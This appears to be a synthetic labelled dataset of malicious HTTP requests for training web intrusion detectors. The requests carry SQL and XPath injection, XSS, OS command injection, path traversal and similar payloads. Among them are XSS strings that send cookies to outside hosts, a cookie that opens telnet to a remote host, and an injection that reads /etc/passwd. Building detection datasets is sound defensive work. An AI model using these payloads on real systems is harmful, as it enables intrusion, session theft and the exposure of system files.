GET /ta8OHT3edyodzmSv/otr0i/hoCtr/71r/nnf@7Q7aV2t2w/jn_0/cmd._h5/ooNmketeiyo/ZnshnhI12wloh8mn.css?tet=3211016&tdslou=0I0s&d5dlmedot=tt19%27+or+++1%3C+++++rsl%2Faz%2FucsY%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D1%5D+or++++%27ae6neak%27++++%3D++%27&e7ii1soh3nkint=srb&1GB1scxpj=gtbH&qaqteIwh=20&YHetcM2.p=kt5rnibk45L+ewinntprocessing-instruction&rt2l=koevalh2tdl&Drg=ocmdeselorlyyr HTTP/1.0
Host: www.8ieroe.com
Connection: close
Accept: */*
Accept-Charset: euc-cn
Accept-Encoding: 
Accept-Language: reo-N, a7CE-nfs2atg, n6nes-cuui, o-t
Cache-Control: no-transform
Client-ip: 111.175.169.32
Cookie: eTsRjyOD=Mpassthruhk;amciJn=iEacod coa3xnq 
Cookie2: $Version="613"
Date: Fri, 15 Jan 10 06:54:50 CET
ETag: "XqCHjr..mNlZEMbdy2Og"
Expect: 100-continue
From: n5thibdN@srSdAet.st
If-Modified-Since: Fri, 08 Feb 08 11:02:13 GMT
If-Unmodified-Since: Wed, 13 Oct 04 10:46:39 GMT
If-Match: "-riVVzoiyZkxcN@eVz7"
If-None-Match: "RLZiUwFUpGCRBZk7apkN"
If-Range: "mA-2.VdhADbORkHeW"
Max-Forwards: 01
MIME-Version: 6.9
Pragma: m=gelnEeb
Proxy-Authorization: Digest nc=3d94f4fE
Authorization: Basic ZWRsY3JsOm5ub2I=
Range: 60-32,32547-,55039-
Referer: http://www.tSteEz2.cz/6eile.tar.gz
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/1.2 (Machintosh; U; Mac OS X 4.0; ue-6m; rv:8.2.7) Gecko/40979155
UA-CPU: PowerPC
UA-Disp: 247,139,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 5208x110
Via: 4.8 119.207.122.125, 5.5 www.8iftnhfa.gif
Transfer-Encoding: deflate
Upgrade: age/5.9, Rsxut/5.9, UadKd0/0.6, p3s6/2.5, oq9/7.3
Warning: 806 44.0.29.60 "Kr4gdh25nfieofeas" 
X-Forwarded-For: 43.207.47.88
X-Serial-Number: 812184590933752195
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 49442
Start - Id: 42985
class: OsCommanding
GET /scnwsesyRs3Yde/ceetDchnhlt/oxexgaaQ3n/copy2JFyJICVstdinPetcj/HusrEOXincludewnullas/s%u9kacceptNc0D/execc_6Zc_Rz0meta/JNAIj@rqXOq..b5/hfdtalvrrehca/ylelHg/rmNreuYmSnGBNK.9.css?egmotd=sat&0MdjJhttpjZmz3R=aeydiihu9C&eerrej5ds1te=netcatsrgtnNw7idi&ibofn=%27ds%3Bi HTTP/1.1
Host: 243.52.155.105
Connection: keep-alive
Accept: image/gif;q=0.8, audio/*
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: min-fresh=37
Client-ip: 119.108.25.110
Cookie: AOxmlU=\"\;   \/usr\/bin\/telnet   www.delltionar.com    5953\;
Cookie2: $Version="214"
Date: Thu, 02 Mar 06 13:14:06 UTC
ETag: W/"i.P9uWX_ane3KCY@w8Re"
Expect: 1rluaea=fyan4a;gnes=otes7
If-Modified-Since: Tue, 29 Jul 08 06:48:03 CET
If-Unmodified-Since: Mon, 07 Apr 08 01:08:42 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 13 Aug 05 14:03:35 CET
Max-Forwards: 885
MIME-Version: 5.7
Authorization: i7r6bt tign=hoEe
Referer: http://www.twnus00o.biz/Nses/e4zre6t/yguvtNld/ssoio/t95esns.dll
Trailer: TE
User-Agent: nRdozxd (eHd0-EcF; 3bv9FT)
UA-Pixels: 445x654
Via: 0.2 7.184.8.75
Upgrade: wfH/1.6, nhn/7.3
----: -------------------------------------------

null

End - Id: 42985
Start - Id: 47506
class: XSS
GET /v@4@Q/t-oxterm/802Soy@y7ap/oMS/dl8qtFczomtue/dlessbhr/h03E/XShIHWftowp-eSir/1JmJf/s9bcC.mdb?dTaaumL=4&Z21-delete3h2=rdelecmytvraef3t&linkH5-OKEyzflogn=%3Cscript++%3Ealert+++%28z8ens.ee4t%29%3C%2Fscript++++%3E&miicliirrcab=84358&Apegoe4nlT=550&kmdn9ulestesxfg=rhL&tB=p HTTP/1.1
Host: 219.5.136.82
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *;q=0.3
Accept-Encoding: deflate
Accept-Language: *;q=0.3
Cache-Control: max-stale
Client-ip: 121.61.23.210
Cookie: wbasrnTjea=nqo;oRoostsuasrfo=rcpawhere;jel3yamy8t3n=t deletehe2e'tilrjkwhere;teC0ea3EnS=eetodeood0tixaon;nrnwfltt6st=968;hOti8e2sneida=0
Cookie2: $Version="6"
Date: Thu, 01 Sep 05 12:46:12 CET
ETag: "qmDTtpLzCe8qlwiktv"
Expect: narz
From: oEh7ee@n2lwamdun.biz
If-Modified-Since: Tue, 13 Dec 05 24:09:39 CET
If-Unmodified-Since: Sat, 13 Jun 09 08:31:22 UTC
If-Match: "GFAfeUfcH9WAiYq"
If-None-Match: "psPV2ruvNNT45x2-w"
If-Range: Sat, 02 Dec 06 11:22:49 GMT
Max-Forwards: 6791
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: Basic dUNjNHI6b3RobG5Scg==
Range: -582231
Referer: /onAb/oy0uew.cgi
TE: chunked;q=0.4
Trailer: Authorization
User-Agent: nH_eDRRFc http://www.qEox.de
UA-CPU: PowerPC
UA-Disp: 076,499,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 7841x155
Via: FTP/3.4 www.sroerS8s.tiff
Transfer-Encoding: compress
Upgrade: atsa/8.3
Warning: 840 www.salomt.jpg "rNd8aaEbphDe" "Fri, 08 Sep 06 13:06:00 GMT"
X-Forwarded-For: 128.172.113.199
X-Serial-Number: 870651819
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 47506
Start - Id: 42529
class: SqlInjection
GET /lJQV6Lr-73bXQwp8JY/uQF2RwEf34/KrmLXARIxv6U./niG/c.4p2/HYsnlpfeo04s.php3?uheTiki4lo=nTkeuh7o4&IUDn=85&ivhu5neFitbee=%27++%2F**%2F+OR++++%2F**%2F++%27He%27+++++%3E+++%27S HTTP/1.0
Host: www.nwoGt5.com
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: oozr-rPueine, orte-sAphenw;q=0.7, nwnt-nyoheae, nthHnut8-a;q=0.9, tpw-Ttw;q=0.5
Cache-Control: only-if-cached
Client-ip: 193.221.217.71
Cookie: co=Et6irIwiderEohlto;2e9ezusciqnldU=19=Rs-aaiLdj@oqdu;tTldluegheo=2930;zn0ennieuglo=gwpwptno7ad7re
Cookie2: $Version="094"
Date: Wed, 21 May 08 18:05:16 UTC
ETag: W/"2W7s5-ENre8Dzaenr_N"
Expect: 100-continue
From: tasre@attmgeuh.ch
If-Modified-Since: Sun, 27 Sep 09 17:55:52 UTC
If-Unmodified-Since: Fri, 12 Nov 04 08:02:17 GMT
If-Match: "TvaPEl6WzRDHh49DB6OI"
If-None-Match: "OCCk3mSVauqc@ljKxz"
If-Range: Sat, 30 Jan 10 13:28:22 CET
Max-Forwards: 57
MIME-Version: 5.3
Pragma: ol=Ret4eili
Proxy-Authorization: Digest nc=ABB8e3d4
Authorization: naiao P9E9e=cekn
Range: 6-,94342-9,9-42
Referer: /amboafj/hdEl2oic/urht/uhXtoesg.jpg
TE: trailers
Trailer: Via
User-Agent: Ceenotsr (tcHtfyJnxF; euDxZLJMTa; vACI6miKU)
UA-CPU: x86
UA-Disp: 3013,748,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 8264x986
Via: riEn3/0.7 92.24.213.228, kFa/5.6 www.plsaese.js, 0.8 www.gn0enu.png
Transfer-Encoding: uglno; Lnvckaat=res0n
Upgrade: hdxl/4.1, ir1i9/2.4
Warning: 039 www.rscr.js "tEodeseiset5e5eLbAid" 
X-Forwarded-For: 10.31.99.179
X-Serial-Number: 49861
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42529
Start - Id: 44397
class: OsCommanding
GET /msadc/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.uc3uirern.gov
Connection: close
Accept: text/*, audio/x-wav
Accept-Charset: x-mac-hebrew, koi8;q=0.5, x-mac-ce
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: min-fresh=8
Client-ip: 145.27.27.144
Cookie: shjevaSH=nph-eTEe;noaqfw4ro=dzPciawn7nhncaottr
Cookie2: $Version="30"
Date: Mon, 08 Jun 09 23:16:06 GMT
ETag: W/"JeOMB8IEzQqMZ5UXUF"
Expect: 100-continue
From: tdMWtde@lyHrvnefs.fr
If-Modified-Since: Sat, 03 Nov 07 13:46:17 GMT
If-Unmodified-Since: Sun, 23 Jan 05 24:22:16 GMT
If-Match: "ucDTbL0pT3w3nRK"
If-None-Match: *
If-Range: Wed, 01 Dec 04 14:20:45 CET
Max-Forwards: 0
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: omh4 yAzTEa=ty8o
Authorization: rtrc iusenooo=galrlc
Range: 3952-044,25518-
Referer: http://www.h01aiene.fr/nAnoed/Aetls/xehcl6.jpg
TE: trailers
Trailer: Proxy-Authorization
User-Agent: aUVtgLvDG http://www.eu1s.st
UA-CPU: Sparc
UA-Disp: 9663,2173,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 8335x3340
Via: 9.7 47.97.212.112:2955, 2.9 www.rda3n.shtml
Transfer-Encoding: identity
Upgrade: asneah/1.8, akhg/1.6
Warning: 354 118.238.114.197 "eyha0hehiihomqhzgiu0" 
X-Forwarded-For: 223.134.122.135
X-Serial-Number: 16212196997401300
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44397
Start - Id: 47418
class: XSS
GET /zeAhwmacgsem/rrnstiaer5/icwsT2/oK_HdroQl@/rooHSVC6lJsQ_k5NST2p/eYMEo-._VdkWuW0wqR@k/d6snugRnTkk7rywMx/l8/hbH/w8/a0rXrVG8QM.pl?rcenalejcn1gie=eCJIQjfOd&clt4cm=%3C%21%5BCDATA%5B%3C%21--%5D%5D%3E%3Cscript+%3E%5Bwindow.open%28%27http%3A%2F%2F224.89.169.174%2Fis.mspx%27%2Bdocument.cookie%29%3B%5D%2F%2F--%3E%3C%2Fscript%3E HTTP/1.1
Host: 192.221.151.147
Connection: close
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 210.252.219.246
Cookie: Si1sjeogXo7=s|;tenahd9=n0d h7catho<and;rmpoeist3qrir=?erm
Cookie2: $Version="9"
Date: Thu, 19 Jul 07 19:34:58 CET
ETag: W/"QWUjZ4EE_zuMajbKCL"
Expect: bnh5u=ermwt
From: Tfteutit@rtorijsiis.be
If-Modified-Since: Sun, 02 Nov 08 09:16:12 CET
If-Unmodified-Since: Fri, 29 Jun 07 22:29:46 UTC
If-Match: "xw3EOv.i@E6HniRCb0RF"
If-None-Match: *
If-Range: *
Max-Forwards: 793
MIME-Version: 4.6
Pragma: s='ca3'
Proxy-Authorization: reu2r otrtsOe=aiyqaet
Authorization: NTLM b25hZG9zZWhkeWhwdHZtcWVsaHQxZTl6TWZubGwzdmllV2F1YmM4dG5pYXZyYWVu
Range: 25658-9605
Referer: http://soeEe.uk/asnp4hla/t0se/olciiooi/teesg1i.jpg
TE: trailers
Trailer: If-Range
User-Agent: uaj6 (ozj6QMPV; 5L3b13i12B; hlTD5_yOT; 4sMLxq8; rpNWvmQsV)
UA-CPU: StrongARM
UA-Disp: 488,2720,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 1670x058
Via: 3.9 www.loig.css
Transfer-Encoding: identity
Upgrade: s8ps/3.5, oy10/6.8
Warning: 029 www.8bsannTr.png "tiuS0ahxectarQgg" "Sat, 24 Jan 04 03:40:28 GMT"
X-Forwarded-For: 14.95.154.93
X-Serial-Number: 42081713059681814203
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47418
Start - Id: 43147
class: OsCommanding
GET /e6q4al/efUbwLJfacn1U@oPjEG/PSnidUFIW4BPQ/ecJBmJ4vq4/ntuYosneeeepAtSSkwe/7MsK.bin?unnu3atIllwcpm=p&3qe=++%3B+echo++++++++%3B+++++w+++++%3B+++uname+-a++++%3B+++++id&mrrxk=yd&oc=ohml&ysajobichoaqOd=nignh7n5usf6e3orry&h6=tmto%3Adocumentl1a1soaeao&htrrlcs7neoosn=mot+t&hd1tYW=ivNnPbK-Q&epddrdoMnx7e=%2Bn%3Dn&HstyleEfQ=f2duLDoen&oi=s2FduavJk%40W&loIbmrd=oXd&sl=rva2Ao+p5a%3E&c6t7fdvnirltaNs=winnt%3Fmweta%28%25+systemr%3Ae HTTP/1.1
Host: 189.250.215.245
Connection: close
Accept: */*
Accept-Charset: koi8-r;q=0.8, ks_c_5601-1987, shift_jis, utf-7
Accept-Encoding: 
Accept-Language: lrtefrgp-2ri;q=0.9, wnhdriha-ai4rCp;q=0.1
Cache-Control: no-store
Client-ip: 66.158.131.150
Cookie: mnnHro7=1;seetagllS=iUSZn;soveim=usNi;npyubfl8n=BEpoo5o4adt
Cookie2: $Version="11"
Date: Thu, 22 Apr 10 05:59:45 GMT
ETag: "8Si792-o4C3zcdKh6"
Expect: tvNyv
From: riAeyrh@tgaMea.st
If-Modified-Since: Wed, 27 Oct 04 01:09:11 UTC
If-Unmodified-Since: Fri, 16 Apr 04 06:13:13 CET
If-Match: *
If-None-Match: "mhjSf-DRCZu.Wxk.J5"
If-Range: "Dr1UN7YVdxvt-oIEZ_i"
Max-Forwards: 39
MIME-Version: 2.9
Pragma: cg8ho=0eHwo
Proxy-Authorization: cenn vpwg=rlsiiwt
Authorization: Basic b2Jzbm1oOm9hZWk=
Range: 46359-,93372-15,76-
Referer: /eOtrz/auolre0o/nlEEav/aQeohuwn/tndzecbe.js
TE: deflate,trailers
Trailer: Host
User-Agent: Mozilla/5.2 (Machintosh; U; Mac OS X 8.4; hr-iZ; rv:5.7.4) Gecko/70177109
UA-CPU: Sparc
UA-Disp: 309,0830,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 699x046
Via: 9.4 138.92.104.80:13
Transfer-Encoding: identity
Upgrade: Iur/4.0, hdo/8.3, gni/0.5, ntt7e1/5.3
Warning: 854 50.62.44.9:3189 "2eaaior" "Sat, 19 Feb 05 12:47:49 UTC"
X-Forwarded-For: 1.132.119.183
X-Serial-Number: 197146981100118
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43147
Start - Id: 49720
class: XPathInjection
GET /heredoleu/ezUNMJ/eheetTraoh0detcem/nryad4az8ds1nvi/ysxLeJs/icv2y2e2/sp@j4zY9BHL-ybCYGjS/i6bezenescrv/umVs6JRF4x/nhQle50mlq3T.jpeg?id=inustttjsigenlAv&kaskat=nmeuiohn%27++++or+++++6+++++%3C+++count%28path%2Fchild%3A%3A*%29+++or++%27m595u0t9%27++%3D%27&da5=stimotRtrOaq7ywo HTTP/1.1
Host: www.symdepEoo.org
Connection: keep-alive
Accept: image/*;q=0.4, video/quicktime;q=0.2, image/png
Accept-Charset: utf-7, iso-8859-6
Accept-Encoding: identity;q=0.6, deflate, deflate
Accept-Language: *;q=0.3
Cache-Control: r7pcnht=rjgcoe6
Client-ip: 108.36.71.41
Cookie: yut=e_@s.WGsu0t5
Cookie2: $Version="70"
Date: Wed, 01 Oct 08 15:11:39 UTC
ETag: "iITkPXqitf-bCHofqIg"
Expect: aeda40o1=roasef;lhishow=zioCeH
From: u5ln@onsTkmM.ch
If-Modified-Since: Tue, 20 Apr 04 18:25:16 GMT
If-Unmodified-Since: Thu, 30 Mar 06 20:57:51 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 14 May 06 10:21:04 GMT
Max-Forwards: 3
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: Digest cnonce="iest9re"
Authorization: Digest uri=/hedrheik/adpmPk/e0tocuAk.gif
Range: -5,-8543,85-24971
Referer: http://www.yofiosi.uk/om0PslFi.ace
TE: trailers
Trailer: Accept
User-Agent: Mozilla/2.3 (compatible; agAnecFRD; Windows NT; ouqoh0lfn; niawG)
UA-CPU: StrongARM
UA-Disp: 731,8185,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 6094x1402
Via: HTTP/6.5 254.107.139.51, FTP/1.2 www.tnae.jpg:20
Transfer-Encoding: deflate
Upgrade: 2sv/4.0, uetOn/7.3
Warning: 552 www.hlm4jou.html:4395 "Roae" 
X-Forwarded-For: 235.101.74.70
X-Serial-Number: 9273829516846529
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49720
Start - Id: 46707
class: XSS
GET /Ar2jNadjed6m/ul5qsMjKUmPe/hdZiHVt.6BuO.mspx?gsnn1ct7Msc=966shoxS&6aei=69870&rm=eo&othgen2aaueei=19&bAmRgb1WB9P=i%25lIlh&se6s=c5kzHNE&EpdreaAeRzo=wetb9ocrndzim9y9neii HTTP/1.1
Host: www.nbtW4l.it:7432
Connection: keep-alive
Accept: audio/*;q=0.1, application/*
Accept-Charset: x-mac-roman, x-mac-turkish;q=0.3, iso-10646-ucs-2;q=0.7, x-mac-turkish
Accept-Encoding: *;q=0.7
Accept-Language: tiraat-tzagueia, ue5os-o;q=0.7, m-lts;q=0.5, iepesh-6ehevt
Cache-Control: max-age=339
Client-ip: 148.68.136.140
Cookie: sei9te= ney;v_E6Irwj=<div     style=    "    background-image:   url(javascript:  [document.location.replace('http://www.ndveto.com/cgi-bin/ingean.cgi'+document.cookie);]);     "    >
Cookie2: $Version="856"
Date: Sun, 19 Nov 06 12:09:47 UTC
ETag: W/"@Cb2dnAruCPukJ7."
Expect: 100-continue
From: sydmNoRr@eYicvet9.com
If-Modified-Since: Sun, 11 Dec 05 21:52:11 CET
If-Unmodified-Since: Tue, 13 Sep 05 24:38:36 CET
If-Match: "_HU-2ifK3TXwH-sR@4Uo"
If-None-Match: "vYtd6PYsdu3duWk-jV"
If-Range: Tue, 13 Apr 10 11:36:16 CET
Max-Forwards: 4682
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: Basic c2Fob2lrZDpldHQwcmx1ZQ==
Authorization: pkemAl oAhpr=metcuien
Range: -6,920-
Referer: /hoefoia.bin
TE: chunked;q=0.6,deflate;q=0.9,trailers
Trailer: From
User-Agent: edirhxpsQoi6asAtNa
UA-CPU: Sparc
UA-Disp: 417,1521,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 450x131
Via: 6.2 www.nksOene.htm, 0.6 www.eett.css, 1.7 239.254.131.209:8081
Transfer-Encoding: reelnr
Upgrade: jolA/9.7, sctItf/5.4, eTkD/8.1, hatAd/2.3
Warning: 710 244.32.72.52 "phsreeteta" "Fri, 24 Feb 06 09:05:16 CET"
X-Forwarded-For: 183.144.127.62
X-Serial-Number: 24725262315078744174
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 46707
Start - Id: 44831
class: PathTransversal
GET /oglat0bq/apetw/2E61OqYnd/nCtbT5-e5Z4oKr5EH4rG/a5pFxt/nYBh/YkG@V@TYxQU.asmx?yn5heSle=aAPOYU&pitfejt2ee=%2F.%2F..%2F..%2F..%2F.%2F..%2F..%2F.%2F..%2F..%2F.%2F..%2F..%2F..%2F&8hE1rvhrpS=33144 HTTP/1.0
Host: www.oeeth2a8a.be
Connection: close
Accept: application/x-tar;q=0.1, image/*, video/mpeg;q=0.1
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 92.163.213.217
Cookie: iSiEytfu=49285;spTdyao=iun;cEna=ToniaSsq5elayi1a;hOaVlD9@luAX=jsaphtsar;8aa=ibxla80aadmincmailn;e3sna=oEUuc
Cookie2: $Version="4"
Date: Wed, 04 Apr 07 24:01:03 CET
ETag: W/"LAeUV2MDP1zNaGt61NV-"
Expect: 100-continue
From: eosehi@IsoiaSe.uk
If-Modified-Since: Sun, 07 Jun 09 04:15:13 CET
If-Unmodified-Since: Sat, 25 Nov 06 19:15:51 UTC
If-Match: "arvxUYUB2bHptKA2"
If-None-Match: "pKruFK87qFe3B6AmOom"
If-Range: "AwNEyj99C2j5zSWS"
Max-Forwards: 7
MIME-Version: 3.1
Pragma: 3emidt6='mreoUhd'
Proxy-Authorization: NTLM cnRhZ25sYWlscmNrMzQweWRwdG9jYW9zZWx0cGVubXZp
Authorization: eH4teM jsxnoc=5ihxiqi
Range: 49-580233,702708-4982,-8
Referer: /eqnkoa.jpeg
TE: trailers,trailers,trailers
Trailer: From
User-Agent: Mozilla/8.2 (Windows; U; Win98 4.6; qe-xj; rv:1.5.7) Gecko/37998807
UA-CPU: MIPS
UA-Disp: 7018,7530,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 123x704
Via: HTTP/5.3 241.190.43.239:8475, 1.1 109.50.57.136, 5.1 www.fwagr.jpg
Transfer-Encoding: deflate
Upgrade: neacoe/5.1, 7qfTia/9.7, negety/9.4, hbiry/6.4
Warning: 479 www.eao96f.png "ldeigihLwAo78oeint" "Mon, 21 Dec 09 20:16:29 UTC"
X-Forwarded-For: 211.195.184.12
X-Serial-Number: 13064
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44831
Start - Id: 35816
class: XPathInjection
GET /wdW6/dH2BF@JXqz/hirog2etth1b4g/sFJAHY0nodeHPq/iQeByBL/e4YBice53DPk7/sudktnrzaezsnrP/e@Byr3mbrOIXFKkrp/gytd4laaefesiysfit9f/ep0wFo2ZokTZ9Q.cgi?emre=%28i++%3C+count%28TtymY%2Fchild%3A%3Atext%28%29%29++++and++j+++%3C++count%28hsoun%2Fchild%3A%3Acomment%28%29%29+and+++k+%3C+++++count%28alcfTe%2Fchild%3A%3A*%29+%29&fey6TcytoAur=o+%26e6SiidlibhavingsiR+ntsock_stream%27t&URfr0=09438497 HTTP/1.0
Host: www.mehqsaleA.be
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: gb2312;q=0.1, cp-932;q=0.4, cp-950;q=0.9, utf-8, x-mac-ce;q=0.8
Accept-Encoding: identity;q=0.2, identity;q=0.0, identity;q=0.5
Accept-Language: iaealn-bRa69tif, tyateRta-Ezv;q=0.4, 7x-aJee;q=0.9, t5rx-hHra, euet-tyeu;q=0.0
Cache-Control: max-age=58805
Client-ip: 121.212.7.151
Cookie: o7zeida1rmsonle=ts3edH1cisfseSe5te;vEGcn=dassntoArUiFe;dsClr=wglrlt4d8awfnr5hae;2c3oIgrZora=pd$o;nc6=bZ00l
Cookie2: $Version="2"
Date: Sat, 08 Sep 07 21:38:53 CET
ETag: "F.kqxYY8TNuKf1u"
Expect: 100-continue
From: atxrynt@ncusdRE.ch
If-Modified-Since: Tue, 14 Aug 07 16:05:19 GMT
If-Unmodified-Since: Sat, 26 Jul 08 01:02:05 UTC
If-Match: "IoOhLtg4v7bU-fuK2D0"
If-None-Match: *
If-Range: "pe.OsHtJFIrMR1m"
Max-Forwards: 750
MIME-Version: 7.4
Pragma: mf2t=easweAts
Proxy-Authorization: luLc Okt8e=3llo
Authorization: tiECe mero=eestwii
Range: 205-0247
Referer: http://www.Fireria.com/a6oethv9/nuea.swf
TE: trailers,deflate,chunked
Trailer: If-None-Match
User-Agent: amsaH8w http://www.nAgz.fr
UA-CPU: x86
UA-Disp: 747,476,16
UA-OS: Linux
UA-Pixels: 4135x5853
Via: Best/1.0 87.213.78.85
Transfer-Encoding: compress
Upgrade: oyytm/9.6, hhc/4.5, Ojwace/7.1, toww7E/9.4
Warning: 952 www.gere3lt.gif "ajcLu" "Fri, 03 Aug 07 19:36:17 GMT"
X-Forwarded-For: 43.11.206.228
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35816
Start - Id: 41039
class: SqlInjection
GET /opsmetanOpsE3/h0t7y-pyD/depawejcduQs/qPQ7t4l/weuhi5oLWeOcO4Txuu/Vzu0pVx/xZHf./-ZcQYevali29EGlog.32/vbscriptN_Kb/1bin.qgy-T.aspx?osrne=wchild&anoe0EZiafkibi=096112526&otOels=bulk+insert++uittmfsOo++from+++%27pwdump.exe%27+++++++with+%28codepage%3D%27RAW%27++++%29 HTTP/1.0
Host: www.efapint.de:59122
Connection: keep-alive
Accept: image/*;q=0.4, video/*, application/rtf;q=0.5
Accept-Charset: big5;q=0.2
Accept-Encoding: 
Accept-Language: Otet-p5iipi;q=0.2
Cache-Control: no-store
Client-ip: 206.200.164.185
Cookie: naezwtesh4rebtt=21223;nphh6vpaSP=ctsaTwelrtpbwh;dea7=49;h1eexrid4uXr4sv=13980
Cookie2: $Version="70"
Date: Thu, 16 Jun 05 13:29:01 UTC
ETag: W/"_WrR1Ly1ZlOqxyWv2v9n"
Expect: 100-continue
From: i4axWsi@dEthgse.cz
If-Modified-Since: Sun, 21 Dec 08 20:35:04 UTC
If-Unmodified-Since: Mon, 08 Aug 05 02:47:58 GMT
If-Match: *
If-None-Match: "RaOp5RQAmz3Z2FktPT1"
If-Range: "zRu2NRpV9XxMIV6l6ykf"
Max-Forwards: 731
MIME-Version: 1.6
Pragma: dharcigt=ht
Proxy-Authorization: dEwdh oSgoauto=ctAcmei
Authorization: tlsTrg fcoEr=nuhn
Range: 7-04,570-
Referer: /yxhbs/eKepznw/ensm0/4sygtlh9/iin2a0e.mpg
TE: deflate;q=0.8
User-Agent: Mozilla/4.5 (X11; U; Solaris 3.3; oi-Oe; rv:2.9.5) Gecko/55288234
UA-CPU: PowerPC
UA-Disp: 3796,7783,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 104x8770
Via: 1.3 95.217.148.30, HTTP/7.6 93.205.51.20:3
Transfer-Encoding: identity
Upgrade: mme/2.4, 09a/7.3, yAr/5.1, ihhdl/6.4
Warning: 886 225.6.48.99 "n1xne5msKpismeoarx" 
X-Forwarded-For: 57.95.233.202
X-Serial-Number: 27676908401
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41039
Start - Id: 43039
class: OsCommanding
PUT /Z9nSEj.5A1.mspx? HTTP/1.1
Content-Length: 68
Content-Language: Jtd,tvp3nteo,ea9ina
Content-Encoding: gzip
Content-Location: /oebat1Dd/ajkUqw1/wadwm4/tj8ueu1s.php4
Content-MD5: bnRyZnVoTGVpZW95YWVhbg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 28 Jan 04 12:46:30 UTC
Last-Modified: Mon, 16 May 05 03:55:47 UTC
Host: www.nwGmo.st
Connection: close
Accept: application/zip;q=0.2
Accept-Charset: x-mac-hebrew, iso-8859-5;q=0.1, x-mac-turkish, windows-1254;q=0.1, x-mac-greek
Accept-Encoding: *;q=0.6
Accept-Language: k-tth9it;q=0.3, iemea-n0jraEmc;q=0.2, Snemr-8gEl;q=0.0, n-e1kneuW
Cache-Control: no-store
Client-ip: 147.157.247.88
Cookie: DMDfGK4Fub=eWF9n2lx2Y
Cookie2: $Version="6"
Date: Sat, 23 May 09 08:51:53 CET
ETag: "AlUxBRc1lFh7_IbRVoc"
Expect: 100-continue
From: a0ee@enelreh.it
If-Modified-Since: Thu, 25 Mar 04 06:11:21 UTC
If-Unmodified-Since: Thu, 24 Apr 08 06:09:09 UTC
If-Match: "2kQ@kSxpFdV4@fPXi1x"
If-None-Match: *
If-Range: Thu, 29 Mar 07 08:50:19 UTC
Max-Forwards: 3
Pragma: 3=cfce
Proxy-Authorization: Digest opaque="ais18i"
Authorization: Basic ZHJycXc6d3JhaHI=
Range: -98633,070828-,-9277
Referer: http://ahundOem.de/5ieys5iE/2nu1rta.shtml
TE: gzip
Trailer: Connection
User-Agent: totenqrgmn (ob.0gctHfi; iia3P-nkP; aK6sSMD)
UA-CPU: Sparc
UA-Disp: 575,612,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 2695x320
Via: 1.3 7.245.118.66, 7.5 www.sh85n9c.png
Transfer-Encoding: gzip
Upgrade: sin/4.4, nanj/1.1, sfgit/8.7, sxHu/2.0
Warning: 949 www.umlpttl.html:72 "q3sco" "Sat, 17 Jul 04 20:43:31 GMT"
X-Forwarded-For: 225.126.234.64
X-Serial-Number: 4857297063808
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~

F4ATQ=%0acat    %0a   /etc/passwd  %0a&4temniaoe=t9voOwl3r

End - Id: 43039
Start - Id: 39358
class: SSI
